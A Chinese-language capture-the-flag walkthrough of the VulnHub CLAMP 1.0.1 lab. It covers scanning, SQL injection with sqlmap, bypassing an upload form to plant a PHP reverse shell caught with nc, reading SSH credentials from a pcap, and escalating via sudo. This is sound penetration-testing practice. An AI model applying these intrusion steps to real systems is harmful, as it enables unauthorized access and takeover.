CLAMP 1.0.1靶机

阿卡丽的神秘铺子2024-08-12 19:57

信息收集:

复制代码 
靶机地址:https://www.vulnhub.com/entry/clamp-101,320/

(1)ip扫描,net扫不到换仅主机就行了

复制代码 
nmap 192.168.8.0/24 -sn | grep -B 2 '00:0C:29:48:66:90'

(2)端口扫描

复制代码 
nmap 192.168.8.130 -p- -A -sV -Pn

(3)目录扫描

复制代码 
dirb http://192.168.8.130

(4)访问80端口,f12查看源码,提示让我扫描更多

(5)使用dirsearch,换了几个大一些的字典,但是没扫出来,访问 /nt4stopc/,下面有一些问题,提示必须收集答案

(6)都是一些判断题,对与错对应1与0,最后结果为

复制代码 
0110111001

(7)点击图中位置,发现存在参数,php语言,尝试注入

(8)and 1=1 --+ 显示正常

(9)and 1=2 --+ 显示异常

(10)是存在注入的,使用 sqlmap 跑一下

复制代码 
python3 sqlmap.py -u "http://192.168.8.130/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch --dbs

库名:

tatil 下表名:

gereksiz 下得到一串值:

复制代码 
hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf  folder upload.php

解码后得到:
uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

(11)可能还是路径,拼接访问

复制代码 
http://192.168.8.130/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/

(12)再拼接 upload.php

复制代码 
http://192.168.8.130/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/upload.php

(13)文件上传,以md5提交,但是没有提交按钮,自己在前端给加一个

复制代码 
<input type="submit">

getshell:

(1)kali 生成反弹 shell

复制代码 
locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

(2)上传该文件后,返回了文件路径,文件名为md5加密后的

复制代码 
osas/2ad6bded962b884337eaeb921d7c2764.php

http://192.168.8.130/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php

(3)nc监听,访问文件,成功反弹shell

提权:

(1)使用 python 提升交互性

复制代码 
python3 -c 'import pty;pty.spawn("/bin/bash")'

(2)在 /var/www/html 下发现 important.pcapng

(3)查看文件,发现内容

复制代码 
email=mkelepce&message=Hello+there%2C+The+password+for+the+SSH+account+you+want+is%3A+mkelepce%3Amklpc-osas112.+If+you+encounter+a+problem%2C+just+mail+it.++Good+work

(4)url解码,得到以下数据

复制代码 
email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it.  Good work

账号密码:
mkelepce:mklpc-osas112.

(5)ssh连接,连接成功

复制代码 
ssh [email protected]
mklpc-osas112.

(6)查看当前权限

复制代码 
sudo -l
mklpc-osas112.

(7)sudo su 提权成功

相关推荐
qq_243050794 小时前
aflplusplus:开源的模糊测试工具!全参数详细教程!Kali Linux教程!(一)
linux·web安全·网络安全·黑客·渗透测试·模糊测试·kali linux
hao_wujing9 小时前
轻量级顺序监控器监控 LLM 中的分解攻击
网络安全
枷锁—sha13 小时前
【DVWA系列】——xss(DOM)——High详细教程
前端·web安全·网络安全·xss
中云DDoS CC防护蔡蔡18 小时前
自己的服务器被 DDOS跟CC攻击了怎么处理,如何抵御攻击?
运维·服务器·经验分享·网络安全·ddos
00后程序员张19 小时前
实战解析:如何用克魔(KeyMob)等工具构建iOS应用稳定性与数据可观测体系
websocket·网络协议·tcp/ip·http·网络安全·https·udp
Bruce_Liuxiaowei21 小时前
某靶场CTF题目:利用Apache APISIX默认Token漏洞(CVE-2020-13945)获取Flag
网络安全·apache·ctf
2501_915921431 天前
iOS性能调试完整流程实录:工具组合下的问题定位与修复实践(含keymob)
websocket·网络协议·tcp/ip·http·网络安全·https·udp
Le_ee1 天前
pikachu——php反序列化
网络安全·靶场·php·pikachu·php反序列
2301_793069821 天前
【术语解释】网络安全((SAST, DAST, SCA, IAST),Hadoop, Spark, Hive 的关系
hive·hadoop·网络安全·spark
网安INF1 天前
CVE-2020-1938源码分析与漏洞复现(Tomcat 文件包含/读取)
java·网络·web安全·网络安全·tomcat·漏洞复现
热门推荐
01Coze扣子平台完整体验和实践(附国内和国际版对比)02【图像处理与机器视觉】XJTU期末考点03KGG转MP3工具|非KGM文件|解密音频04零代码入门 | Coze——让大模型接入自己的数据库05海康Visionmaster-常见问题排查方法-启动阶段06YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】07扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解08从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑09【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!10DeepSeek各版本说明与优缺点分析